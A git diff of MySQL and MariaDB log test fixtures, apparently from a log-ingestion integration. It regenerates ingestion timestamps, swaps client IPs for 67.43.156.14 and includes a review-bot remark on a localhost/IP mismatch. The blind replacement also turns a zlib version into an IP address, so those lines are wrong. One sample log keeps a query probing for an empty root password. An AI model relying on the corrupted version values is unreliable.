@@ -2715,9 +2715,9 @@ }, { "@timestamp": "2016-12-09T14:18:56.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.731018308Z", + "ingested": "2021-12-09T13:41:34.473706300Z", "category": [ "database" ], @@ -2732,7 +2732,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.731019016Z", + "ingested": "2021-12-09T13:41:34.473712500Z", "category": [ "database" ], @@ -2747,7 +2747,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.731020166Z", + "ingested": "2021-12-09T13:41:34.473718800Z", "category": [ "database" ], @@ -2762,7 +2762,7 @@ "@timestamp": "2016-12-09T14:18:57.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.731020842Z", + "ingested": "2021-12-09T13:41:34.473725100Z", "category": [ "database" ], @@ -2777,7 +2777,7 @@ "@timestamp": "2016-12-09T14:18:57.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.731021499Z", + "ingested": "2021-12-09T13:41:34.473732400Z", "category": [ "database" ], @@ -2792,7 +2792,7 @@ "@timestamp": "2016-12-09T14:18:58.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.731022187Z", + "ingested": "2021-12-09T13:41:34.473737800Z", "category": [ "database" ], @@ -2810,7 +2810,7 @@ }, "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306", "event": { - "ingested": "2021-06-21T12:35:18.731022845Z", + "ingested": "2021-12-09T13:41:34.473742Z", "category": [ "database" ], 
@@ -2828,7 +2828,7 @@ }, "message": "- '127.0.0.1' resolves to '127.0.0.1';", "event": { - "ingested": "2021-06-21T12:35:18.731023637Z", + "ingested": "2021-12-09T13:41:34.473746200Z", "category": [ "database" ], @@ -2846,7 +2846,7 @@ }, "message": "Server socket created on IP: '127.0.0.1'.", "event": { - "ingested": "2021-06-21T12:35:18.731024452Z", + "ingested": "2021-12-09T13:41:34.473751200Z", "category": [ "database" ], @@ -2864,7 +2864,7 @@ }, "message": "Event Scheduler: Loaded 0 events", "event": { - "ingested": "2021-06-21T12:35:18.731025208Z", + "ingested": "2021-12-09T13:41:34.473757900Z", "category": [ "database" ], @@ -2882,7 +2882,7 @@ }, "message": "/usr/sbin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:18.731026015Z", + "ingested": "2021-12-09T13:41:34.473764200Z", "category": [ "database" ], @@ -2896,7 +2896,7 @@ { "message": "Version: '5.5.53-0ubuntu0.12.04.1' socket: '/var/run/mysqld/mysqld.sock' port: 3306 (Ubuntu)", "event": { - "ingested": "2021-06-21T12:35:18.731026922Z", + "ingested": "2021-12-09T13:41:34.473770800Z", "category": [ "database" ], @@ -2914,7 +2914,7 @@ }, "message": "/usr/sbin/mysqld: Normal shutdown", "event": { - "ingested": "2021-06-21T12:35:18.731028158Z", + "ingested": "2021-12-09T13:41:34.473777Z", "category": [ "database" ], @@ -2928,7 +2928,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.731029047Z", + "ingested": "2021-12-09T13:41:34.473783400Z", "category": [ "database" ], @@ -2946,7 +2946,7 @@ }, "message": "Event Scheduler: Purging the queue. 0 events", "event": { - "ingested": "2021-06-21T12:35:18.731029761Z", + "ingested": "2021-12-09T13:41:34.473789600Z", "category": [ "database" ], @@ -2961,7 +2961,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.731030465Z", + "ingested": "2021-12-09T13:41:34.473795300Z", "category": [ "database" ], 
@@ -2976,7 +2976,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595685", "event": { - "ingested": "2021-06-21T12:35:18.731031192Z", + "ingested": "2021-12-09T13:41:34.473813900Z", "category": [ "database" ], @@ -2994,7 +2994,7 @@ }, "message": "/usr/sbin/mysqld: Shutdown complete", "event": { - "ingested": "2021-06-21T12:35:18.731031964Z", + "ingested": "2021-12-09T13:41:34.473820300Z", "category": [ "database" ], @@ -3008,7 +3008,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.731032693Z", + "ingested": "2021-12-09T13:41:34.473826500Z", "category": [ "database" ], @@ -3026,7 +3026,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.731033555Z", + "ingested": "2021-12-09T13:41:34.473832700Z", "category": [ "database" ], @@ -3044,7 +3044,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.731034784Z", + "ingested": "2021-12-09T13:41:34.473837900Z", "category": [ "database" ], @@ -3059,7 +3059,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.731035683Z", + "ingested": "2021-12-09T13:41:34.473844200Z", "category": [ "database" ], @@ -3074,7 +3074,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.731036465Z", + "ingested": "2021-12-09T13:41:34.473850400Z", "category": [ "database" ], 
@@ -3087,9 +3087,9 @@ }, { "@timestamp": "2016-12-09T14:37:57.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.731037325Z", + "ingested": "2021-12-09T13:41:34.473856900Z", "category": [ "database" ], @@ -3104,7 +3104,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.731038051Z", + "ingested": "2021-12-09T13:41:34.473863200Z", "category": [ "database" ], @@ -3119,7 +3119,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.731039146Z", + "ingested": "2021-12-09T13:41:34.473869400Z", "category": [ "database" ], @@ -3134,7 +3134,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.731039913Z", + "ingested": "2021-12-09T13:41:34.473875700Z", "category": [ "database" ], @@ -3149,7 +3149,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.731040652Z", + "ingested": "2021-12-09T13:41:34.473882Z", "category": [ "database" ], @@ -3164,7 +3164,7 @@ "@timestamp": "2016-12-09T14:37:58.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595685", "event": { - "ingested": "2021-06-21T12:35:18.731041456Z", + "ingested": "2021-12-09T13:41:34.473888300Z", "category": [ "database" ], @@ -3182,7 +3182,7 @@ }, "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306", "event": { - "ingested": "2021-06-21T12:35:18.731042229Z", + "ingested": "2021-12-09T13:41:34.473894600Z", "category": [ "database" ], 
@@ -3200,7 +3200,7 @@ }, "message": "- '127.0.0.1' resolves to '127.0.0.1';", "event": { - "ingested": "2021-06-21T12:35:18.731043027Z", + "ingested": "2021-12-09T13:41:34.473900900Z", "category": [ "database" ], @@ -3218,7 +3218,7 @@ }, "message": "Server socket created on IP: '127.0.0.1'.", "event": { - "ingested": "2021-06-21T12:35:18.731043891Z", + "ingested": "2021-12-09T13:41:34.473907200Z", "category": [ "database" ], @@ -3236,7 +3236,7 @@ }, "message": "Event Scheduler: Loaded 0 events", "event": { - "ingested": "2021-06-21T12:35:18.731044818Z", + "ingested": "2021-12-09T13:41:34.473914400Z", "category": [ "database" ], @@ -3254,7 +3254,7 @@ }, "message": "/usr/sbin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:18.731045756Z", + "ingested": "2021-12-09T13:41:34.473918900Z", "category": [ "database" ], @@ -3268,7 +3268,7 @@ { "message": "Version: '5.5.53-0ubuntu0.12.04.1-log' socket: '/var/run/mysqld/mysqld.sock' port: 3306 (Ubuntu)", "event": { - "ingested": "2021-06-21T12:35:18.731046530Z", + "ingested": "2021-12-09T13:41:34.473924Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json index 1cde6943500..8833f11b9d6 100644 --- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json +++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json @@ -10,7 +10,7 @@ }, "message": "[MY-013169] [Server] /usr/sbin/mysqld (mysqld 8.0.15) initializing of server in progress as process 1640", "event": { - "ingested": "2021-06-21T12:35:19.977963724Z", + "ingested": "2021-12-09T13:41:35.240630300Z", "code": "MY-013169", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", 
@@ -33,7 +33,7 @@ }, "message": "[MY-010453] [Server] root@localhost is created with an empty password ! Please consider switching off the --initialize-insecure option.", "event": { - "ingested": "2021-06-21T12:35:19.977969667Z", + "ingested": "2021-12-09T13:41:35.240640Z", "code": "MY-010453", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -56,7 +56,7 @@ }, "message": "[MY-013170] [Server] /usr/sbin/mysqld (mysqld 8.0.15) initializing of server has completed", "event": { - "ingested": "2021-06-21T12:35:19.977972172Z", + "ingested": "2021-12-09T13:41:35.240646500Z", "code": "MY-013170", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -79,7 +79,7 @@ }, "message": "[MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.15) starting as process 1688", "event": { - "ingested": "2021-06-21T12:35:19.977973082Z", + "ingested": "2021-12-09T13:41:35.240652700Z", "code": "MY-010116", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -102,7 +102,7 @@ }, "message": "[MY-010068] [Server] CA certificate ca.pem is self signed.", "event": { - "ingested": "2021-06-21T12:35:19.977973827Z", + "ingested": "2021-12-09T13:41:35.240659600Z", "code": "MY-010068", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -125,7 +125,7 @@ }, "message": "[MY-011810] [Server] Insecure configuration for --pid-file: Location '/tmp' in the path is accessible to all OS users. Consider choosing a different directory.", "event": { - "ingested": "2021-06-21T12:35:19.977974351Z", + "ingested": "2021-12-09T13:41:35.240664200Z", "code": "MY-011810", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", 
@@ -148,7 +148,7 @@ }, "message": "[MY-013172] [Server] Received SHUTDOWN from user boot. Shutting down mysqld (Version: 8.0.15).", "event": { - "ingested": "2021-06-21T12:35:19.977974872Z", + "ingested": "2021-12-09T13:41:35.240669300Z", "code": "MY-013172", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -171,7 +171,7 @@ }, "message": "[MY-010910] [Server] /usr/sbin/mysqld: Shutdown complete (mysqld 8.0.15) MySQL Community Server - GPL.", "event": { - "ingested": "2021-06-21T12:35:19.977975387Z", + "ingested": "2021-12-09T13:41:35.240675Z", "code": "MY-010910", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -194,7 +194,7 @@ }, "message": "[MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.15) starting as process 1834", "event": { - "ingested": "2021-06-21T12:35:19.977975922Z", + "ingested": "2021-12-09T13:41:35.240680300Z", "code": "MY-010116", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -217,7 +217,7 @@ }, "message": "[MY-010068] [Server] CA certificate ca.pem is self signed.", "event": { - "ingested": "2021-06-21T12:35:19.977976440Z", + "ingested": "2021-12-09T13:41:35.240685600Z", "code": "MY-010068", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -240,7 +240,7 @@ }, "message": "[MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.15' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL.", "event": { - "ingested": "2021-06-21T12:35:19.977976957Z", + "ingested": "2021-12-09T13:41:35.240689900Z", "code": "MY-010931", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", 
@@ -263,7 +263,7 @@
 },
 "message": "[MY-011323] [Server] X Plugin ready for connections. Socket: '/var/run/mysqld/mysqlx.sock' bind-address: '::' port: 33060",
 "event": {
- "ingested": "2021-06-21T12:35:19.977977684Z",
+ "ingested": "2021-12-09T13:41:35.240694800Z",
 "code": "MY-011323",
 "provider": "Server",
 "created": "2021-06-17T15:20:05.914488060Z",
diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log
index a451c6b7e40..8c23c8b6b84 100644
--- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log
+++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log
@@ -1,5 +1,5 @@
 # Time: 180613 11:04:36
-# User@Host: root[root] @ localhost [121.0.0.1]
+# User@Host: root[root] @ localhost [67.43.156.14]
 # Thread_id: 5 Schema: QC_hit: No
 # Query_time: 2.000652 Lock_time: 0.000000 Rows_sent: 1 Rows_examined: 0
 SET timestamp=1528898676;
diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log-expected.json
index 40c1789c121..79cf5a89bdb 100644
--- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log-expected.json
+++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log-expected.json
@@ -18,12 +18,12 @@
 "thread_id": 5
 },
 "source": {
- "ip": "121.0.0.1",
+ "ip": "67.43.156.14",
 "domain": "localhost"
 },
 "event": {
 "duration": 2000652000,
- "ingested": "2021-06-21T12:35:20.266324325Z",
+ "ingested": "2021-12-09T13:41:35.485304400Z",
 "category": [
 "database"
 ],
diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-2-12.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-2-12.log-expected.json
index 4ca93d94190..dfe9f88f4d1 100644
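Review bot: The new `# User@Host: root[root] @ localhost [67.43.156.14]` line in test-mariadb-10-1-21.log pairs the hostname `localhost` with a routable address from the test subset, so the fixture now describes a local session that arrives from a public IP, and the regenerated test-mariadb-10-1-21.log-expected.json in the same commit carries the same pairing (`"ip": "67.43.156.14"` next to `"domain": "localhost"`). The old value `121.0.0.1` reads like a typo of `127.0.0.1`; if this record is meant to stay a genuine local connection, `# User@Host: root[root] @ localhost [127.0.0.1]` is the faithful value and presumably needs no address from the supported subset, since a loopback address would not be expected to trigger a geo lookup. If the intent is instead to exercise geo enrichment on this record, the hostname should change along with the IP so the sample stays internally consistent. The other slowlog fixtures touched here (test-mysql-5-7-22.log, test-mysql-debian-5-7-17.log) keep a non-local hostname, so only this file is affected.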
--- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-2-12.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-2-12.log-expected.json @@ -24,7 +24,7 @@ }, "event": { "duration": 2000227000, - "ingested": "2021-06-21T12:35:20.297388177Z", + "ingested": "2021-12-09T13:41:35.557203300Z", "category": [ "database" ], @@ -69,7 +69,7 @@ }, "event": { "duration": 178306016000, - "ingested": "2021-06-21T12:35:20.297389229Z", + "ingested": "2021-12-09T13:41:35.557211900Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-3-13.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-3-13.log-expected.json index 956145ba6c9..cc10e0bcd14 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-3-13.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-3-13.log-expected.json @@ -37,7 +37,7 @@ }, "event": { "duration": 2461578000, - "ingested": "2021-06-21T12:35:20.337400589Z", + "ingested": "2021-12-09T13:41:35.648745800Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-explain.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-explain.log-expected.json index 6e23b460725..d55613f3fd3 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-explain.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-explain.log-expected.json @@ -23,7 +23,7 @@ }, "event": { "duration": 5524103000, - "ingested": "2021-06-21T12:35:20.361798659Z", + "ingested": "2021-12-09T13:41:35.708066900Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log index 506ec108f87..a30c318cb90 100644 
--- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log
+++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log
@@ -1,5 +1,5 @@
 # Time: 2018-08-07T16:27:47.169604+08:00
-# User@Host: root[root] @ [218.76.8.37] Id: 7234
+# User@Host: root[root] @ [67.43.156.14] Id: 7234
 # Query_time: 15.000223 Lock_time: 0.000000 Rows_sent: 1 Rows_examined: 0
 SET timestamp=1533630467;
 select sleep(15);
@@ -9,7 +9,7 @@ select sleep(15);
 SET timestamp=1533630467;
 SELECT count(*) FROM mysql.user WHERE user='root' and password='';
 # Time: 2018-08-07T16:27:47.169604+08:00
-# User@Host: appuser[appuser] @ apphost [1.1.1.1] Id: 10997316
+# User@Host: appuser[appuser] @ apphost [67.43.156.14] Id: 10997316
 # Query_time: 4.071491 Lock_time: 0.000212 Rows_sent: 1000 Rows_examined: 1489615
 SET timestamp=1533630467;
 SELECT mcu.mcu_guid, mcu.cus_guid, mcu.mcu_url, mcu.mcu_crawlelements, mcu.mcu_order, GROUP_CONCAT(mca.mca_guid SEPARATOR ";") as mca_guid
@@ -24,7 +24,7 @@ SELECT mcu.mcu_guid, mcu.cus_guid, mcu.mcu_url, mcu.mcu_crawlelements, mcu.mcu_o
 ORDER BY mcu.mcu_order ASC
 LIMIT 1000;
 # Time: 2018-08-07T16:27:47.169604+08:00
-# User@Host: appuser[appuser] @ apphost [1.1.1.1] Id: 10999834
+# User@Host: appuser[appuser] @ apphost [67.43.156.14] Id: 10999834
 # Query_time: 10.346539 Lock_time: 0.000036 Rows_sent: 0 Rows_examined: 4751313
 SET timestamp=1533630467;
 call load_stats(1, '2017-04-28 00:00:00');
diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log-expected.json
index 711660d6206..c93ec6c4558 100644
--- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log-expected.json
+++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log-expected.json
@@ -17,11 +17,11 @@ "thread_id": 7234 }, "source": { - "ip": "218.76.8.37" + "ip": "67.43.156.14" }, "event": { "duration": 15000223000, - "ingested": "2021-06-21T12:35:20.377765006Z", + "ingested": "2021-12-09T13:41:35.728525400Z", "category": [ "database" ], @@ -54,7 +54,7 @@ }, "event": { "duration": 153000, - "ingested": "2021-06-21T12:35:20.377766884Z", + "ingested": "2021-12-09T13:41:35.728536500Z", "category": [ "database" ], @@ -84,12 +84,12 @@ "thread_id": 10997316 }, "source": { - "ip": "1.1.1.1", + "ip": "67.43.156.14", "domain": "apphost" }, "event": { "duration": 4071491000, - "ingested": "2021-06-21T12:35:20.377768625Z", + "ingested": "2021-12-09T13:41:35.728547300Z", "category": [ "database" ], @@ -119,12 +119,12 @@ "thread_id": 10999834 }, "source": { - "ip": "1.1.1.1", + "ip": "67.43.156.14", "domain": "apphost" }, "event": { "duration": 10346539000, - "ingested": "2021-06-21T12:35:20.377770225Z", + "ingested": "2021-12-09T13:41:35.728558100Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json index acc188bb501..0d8f4e370f9 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json @@ -22,7 +22,7 @@ }, "event": { "duration": 11004467000, - "ingested": "2021-06-21T12:35:20.430622043Z", + "ingested": "2021-12-09T13:41:35.870852100Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log index 2b92ad9c058..9ead07458b0 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log 
+++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log
@@ -1,4 +1,4 @@
-# User@Host: apphost[apphost] @ apphost [1.1.1.1] Id: 10997316
+# User@Host: apphost[apphost] @ apphost [67.43.156.14] Id: 10997316
 # Query_time: 4.071491 Lock_time: 0.000212 Rows_sent: 1000 Rows_examined: 1489615
 SET timestamp=1493370459;
 SELECT mcu.mcu_guid, mcu.cus_guid, mcu.mcu_url, mcu.mcu_crawlelements, mcu.mcu_order, GROUP_CONCAT(mca.mca_guid SEPARATOR ";") as mca_guid
@@ -13,12 +13,12 @@ SELECT mcu.mcu_guid, mcu.cus_guid, mcu.mcu_url, mcu.mcu_crawlelements, mcu.mcu_o
 ORDER BY mcu.mcu_order ASC
 LIMIT 1000;
 # Time: 2017-04-28T09:16:30.738365Z
-# User@Host: apphost[apphost] @ apphost [1.1.1.1] Id: 10999834
+# User@Host: apphost[apphost] @ apphost [67.43.156.14] Id: 10999834
 # Query_time: 10.346539 Lock_time: 0.000036 Rows_sent: 0 Rows_examined: 4751313
 SET timestamp=1493370990;
 call load_stats(1, '2017-04-28 00:00:00');
 # Time: 2017-04-28T09:31:31.133657Z
-# User@Host: apphost[apphost] @ apphost [1.1.1.1] Id: 11004208
+# User@Host: apphost[apphost] @ apphost [67.43.156.14] Id: 11004208
 # Query_time: 10.508030 Lock_time: 0.000034 Rows_sent: 0 Rows_examined: 4754675
 SET timestamp=1493371891;
 call load_stats(1, '2017-04-28 00:00:00');
diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log-expected.json
index f254d70878a..cd7a0602d66 100644
--- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log-expected.json
+++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log-expected.json
@@ -16,12 +16,12 @@
 "thread_id": 10997316
 },
 "source": {
- "ip": "1.1.1.1",
+ "ip": "67.43.156.14",
 "domain": "apphost"
 },
 "event": {
 "duration": 4071491000,
- "ingested": "2021-06-21T12:35:20.446734721Z",
+ "ingested": "2021-12-09T13:41:35.921854400Z",
 "category": [
 "database"
 ],
@@ -51,12 +51,12 @@ "thread_id": 10999834 }, "source": { - "ip": "1.1.1.1", + "ip": "67.43.156.14", "domain": "apphost" }, "event": { "duration": 10346539000, - "ingested": "2021-06-21T12:35:20.446738422Z", + "ingested": "2021-12-09T13:41:35.921868700Z", "category": [ "database" ], @@ -86,12 +86,12 @@ "thread_id": 11004208 }, "source": { - "ip": "1.1.1.1", + "ip": "67.43.156.14", "domain": "apphost" }, "event": { "duration": 10508030000, - "ingested": "2021-06-21T12:35:20.446739371Z", + "ingested": "2021-12-09T13:41:35.921879500Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-19.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-19.log-expected.json index e96a1927e83..8148b2b8147 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-19.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-19.log-expected.json @@ -20,7 +20,7 @@ }, "event": { "duration": 100000, - "ingested": "2021-06-21T12:35:20.487393663Z", + "ingested": "2021-12-09T13:41:36.047116100Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json index a9ac3954785..615d73c8516 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json @@ -21,7 +21,7 @@ }, "event": { "duration": 153000, - "ingested": "2021-06-21T12:35:20.504197586Z", + "ingested": "2021-12-09T13:41:36.098106400Z", "category": [ "database" ], 
@@ -53,7 +53,7 @@ }, "event": { "duration": 2456000, - "ingested": "2021-06-21T12:35:20.504198144Z", + "ingested": "2021-12-09T13:41:36.098112100Z", "category": [ "database" ], @@ -85,7 +85,7 @@ }, "event": { "duration": 6278000, - "ingested": "2021-06-21T12:35:20.504198695Z", + "ingested": "2021-12-09T13:41:36.098118Z", "category": [ "database" ], @@ -117,7 +117,7 @@ }, "event": { "duration": 262000, - "ingested": "2021-06-21T12:35:20.504199245Z", + "ingested": "2021-12-09T13:41:36.098123500Z", "category": [ "database" ], @@ -149,7 +149,7 @@ }, "event": { "duration": 323000, - "ingested": "2021-06-21T12:35:20.504199799Z", + "ingested": "2021-12-09T13:41:36.098129Z", "category": [ "database" ], @@ -181,7 +181,7 @@ }, "event": { "duration": 7084000, - "ingested": "2021-06-21T12:35:20.504200347Z", + "ingested": "2021-12-09T13:41:36.098134500Z", "category": [ "database" ], @@ -213,7 +213,7 @@ }, "event": { "duration": 277000, - "ingested": "2021-06-21T12:35:20.504200888Z", + "ingested": "2021-12-09T13:41:36.098140Z", "category": [ "database" ], @@ -245,7 +245,7 @@ }, "event": { "duration": 254000, - "ingested": "2021-06-21T12:35:20.504201439Z", + "ingested": "2021-12-09T13:41:36.098145500Z", "category": [ "database" ], @@ -277,7 +277,7 @@ }, "event": { "duration": 297000, - "ingested": "2021-06-21T12:35:20.504202053Z", + "ingested": "2021-12-09T13:41:36.098151Z", "category": [ "database" ], @@ -309,7 +309,7 @@ }, "event": { "duration": 1676000, - "ingested": "2021-06-21T12:35:20.504202828Z", + "ingested": "2021-12-09T13:41:36.098157Z", "category": [ "database" ], @@ -341,7 +341,7 @@ }, "event": { "duration": 8782000, - "ingested": "2021-06-21T12:35:20.504203367Z", + "ingested": "2021-12-09T13:41:36.098162500Z", "category": [ "database" ], @@ -374,7 +374,7 @@ }, "event": { "duration": 2000268000, - "ingested": "2021-06-21T12:35:20.504204455Z", + "ingested": "2021-12-09T13:41:36.098173500Z", "category": [ "database" ], 
@@ -408,7 +408,7 @@ }, "event": { "duration": 138000, - "ingested": "2021-06-21T12:35:20.504205659Z", + "ingested": "2021-12-09T13:41:36.098184700Z", "category": [ "database" ], @@ -441,7 +441,7 @@ }, "event": { "duration": 159000, - "ingested": "2021-06-21T12:35:20.504206736Z", + "ingested": "2021-12-09T13:41:36.098195700Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json index fc80b5766e9..f70f0393c98 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json @@ -23,7 +23,7 @@ }, "event": { "duration": 2475469000, - "ingested": "2021-06-21T12:35:20.693828588Z", + "ingested": "2021-12-09T13:41:36.500388500Z", "category": [ "database" ], @@ -75,7 +75,7 @@ }, "event": { "duration": 2631844000, - "ingested": "2021-06-21T12:35:20.693829569Z", + "ingested": "2021-12-09T13:41:36.500399300Z", "kind": "event", "start": "2019-03-24T14:04:51.082107Z", "end": "2019-03-24T14:04:53.713951Z", diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19-innodb.log-expected.json 